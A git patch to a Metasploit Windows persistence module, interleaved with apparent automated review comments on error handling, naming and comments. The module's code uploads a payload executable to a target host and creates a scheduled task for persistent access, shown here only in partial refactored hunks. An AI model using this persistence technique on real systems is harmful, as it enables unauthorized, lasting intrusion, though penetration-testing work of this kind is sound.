From bbf8fe0213ed884e0745b748029182313d9149cb Mon Sep 17 00:00:00 2001 From: smilingraccoon Date: Wed, 13 Feb 2013 18:10:05 -0500 Subject: [PATCH] Use Post::File methods and fail_with --- .../exploits/windows/local/s4u_persistence.rb | 72 +++++++------------ 1 file changed, 26 insertions(+), 46 deletions(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 0d5189064a..9f00f8d528 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -39,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Local 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], + 'DisclosureDate' => [ 'Jan 2 2013' ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], @@ -66,15 +67,13 @@ class Metasploit3 < Msf::Exploit::Local def exploit if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) - print_error("This module only works on Vista/2008 and above") - return + fail_with(Exploit::Failure::NoTarget, "This module only works on Vista/2008 and above") end if datastore['TRIGGER'] == "event" if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil? - print_error("Advanced options EVENT_LOG and EVENT_ID required for event") print_status("The properties of any event in the event viewer will contain this information") - return + fail_with(Exploit::Failure::BadConfig, "Advanced options EVENT_LOG and EVENT_ID required for event") end end @@ -88,8 +87,7 @@ class Metasploit3 < Msf::Exploit::Local xml_path,rexe_path = generate_path(rexename) # Upload REXE to victim fs - upload_response = upload_rexe(rexe_path, payload) - return if not upload_response + upload_rexe(rexe_path, payload) # Create basic XML outline xml = create_xml(rexe_path) 
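Review bot: The added `'DisclosureDate'` entry in the module info hash wraps the date in an array, whereas the framework convention, as far as I know it, is a plain string. Any code that parses or formats the date would receive `['Jan 2 2013']` rather than text. I would write it as `'DisclosureDate' => 'Jan 2 2013',`. The info hash starts and ends outside this hunk.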
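Review bot: The trigger validation in `exploit` compares `datastore['TRIGGER']` with lowercase `"event"`, but the Security-log warning in `create_task` (hunk at -381) compares it with `"Event"`. For any given value only one of the two can match, unless the option is normalised somewhere outside this diff. Normalising once, for example `trigger = datastore['TRIGGER'].to_s.downcase`, and comparing against a single spelling in both places would remove the ambiguity. The body of `exploit` continues into the next hunk.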
@@ -98,16 +96,13 @@ class Metasploit3 < Msf::Exploit::Local xml = add_xml_triggers(xml) # Write XML to victim fs, if fail clean up - if not write_xml(xml, xml_path) - delete_file(rexe_path) - return - end + write_xml(xml, xml_path, rexe_path) # Name task with Opt or give random name schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) # Create task with modified XML - task = create_task(xml_path, schname, rexe_path) + create_task(xml_path, schname, rexe_path) end ############################################################## @@ -115,16 +110,11 @@ class Metasploit3 < Msf::Exploit::Local # Returns name def generate_rexename - if datastore['REXENAME'].nil? - rexename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" - return rexename - elsif datastore['REXENAME'] =~ /\.exe$/ - rexename = datastore['REXENAME'] - return rexename - else + rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + if not rexename =~ /\.exe$/ print_warning("#{datastore['REXENAME']} isn't an exe") - return rexename end + return rexename end ############################################################## @@ -133,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local def generate_path(rexename) # generate a path to write payload and xml - path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + path = datastore['PATH'] || expand_path("%TEMP%") xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" rexe_path = "#{path}\\#{rexename}" return xml_path,rexe_path 
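Review bot: In `generate_rexename` the extension test `/\.exe$/` is case-sensitive, and `$` also matches before a trailing newline. A name such as `FOO.EXE` therefore triggers the "isn't an exe" warning, while a value ending in `.exe` plus a newline passes silently. `unless rexename =~ /\.exe\z/i` states the intended check exactly. The warning could also interpolate the local `rexename` instead of re-reading `datastore['REXENAME']`. The header comment should say that a non-.exe name is still returned unchanged after the warning.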
@@ -146,19 +136,15 @@ class Metasploit3 < Msf::Exploit::Local def upload_rexe(path, payload) vprint_status("Uploading #{path}") if file? path - print_error("File #{path} already exists...exiting") - return false + fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") end begin - fd = client.fs.file.new(path, "wb") - fd.write(payload) - fd.close - rescue - print_error("Could not upload to #{path}") - return false + write_file(path, payload) + rescue => e + puts e + fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") end print_status("Successfully uploaded remote executable to #{path}") - return true end ############################################################## @@ -317,21 +303,18 @@ class Metasploit3 < Msf::Exploit::Local # Takes the XML and a path and writes file to filesystem # Returns boolean for success - def write_xml(xml, path) + def write_xml(xml, path, rexe_path) + if file? path + delete_file(rexe_path) + fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") + end begin - if file? path - print_error("File #{path} already exists...exiting") - return false - end - fd = session.fs.file.new(path, "wb") - fd.write(xml) - fd.close + write_file(path, xml) rescue - print_error("Issues writing XML to #{path}") - return false + delete_file(rexe_path) + fail_with(Exploit::Failure::Unknown, "Issues writing XML to #{path}") end print_status("Successfully wrote XML file to #{path}") - return true end ############################################################## @@ -340,12 +323,10 @@ class Metasploit3 < Msf::Exploit::Local def delete_file(path) begin - session.fs.file.rm(path) + file_rm(path) rescue print_warning("Could not delete file #{path}, delete manually") - return false end - return true end ############################################################## 
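Review bot: The new `rescue => e` branch in `upload_rexe` reports the exception with `puts e`, which writes to the process's stdout rather than through the module's output methods. The detail can therefore be lost or appear outside the console that ran the module. Folding it into the failure keeps it in one place: `fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}: #{e}")`. The bare `rescue` blocks in `write_xml` and `delete_file` (the next two hunks) discard the exception entirely and would benefit from capturing it and passing it to `vprint_error`. The "already exists" case may also fit `Exploit::Failure::BadConfig` better than `Unknown`, since it depends on the chosen path and name.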
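Review bot: The comment above `write_xml` still says "Returns boolean for success", but after this change the method no longer returns a status and aborts through `fail_with`. It also gained a `rexe_path` parameter that the comment does not mention. Suggested wording: `# Writes the XML to path; on any failure deletes rexe_path and aborts via fail_with`. The comments above `upload_rexe` and `delete_file` lie outside the visible hunks and may carry the same stale "returns" wording, since both methods lost their boolean returns in this commit.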
@@ -381,14 +362,13 @@ class Metasploit3 < Msf::Exploit::Local :delete_commands => del_task } ) - return true elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/ print_error("The scheduled task name is already in use") # Clean up delete_file(rexe_path) delete_file(path) else - print_error("Issues creating task using XML file schtasks") + error = "Issues creating task using XML file schtasks" vprint_error("Error: #{create_task_response}") if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event" print_warning("Security log can restricted by UAC, try a different trigger") @@ -396,7 +376,7 @@ class Metasploit3 < Msf::Exploit::Local # Clean up delete_file(rexe_path) delete_file(path) - return false + fail_with(Exploit::Failure::Unknown, error) end end end \ No newline at end of file
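Review bot: The `elsif` branch for "Cannot create a file when that file already exists" only prints an error and cleans up. After this commit a task-name collision therefore lets `create_task` return normally, while the `else` branch raises through `fail_with`. After the two `delete_file` calls I would add `fail_with(Exploit::Failure::BadConfig, "The scheduled task name is already in use")` and drop the separate `print_error`. In the `else` branch the local `error` is assigned several lines before its single use in the following hunk, so passing the string straight to `fail_with` would be simpler. `create_task` begins before this hunk.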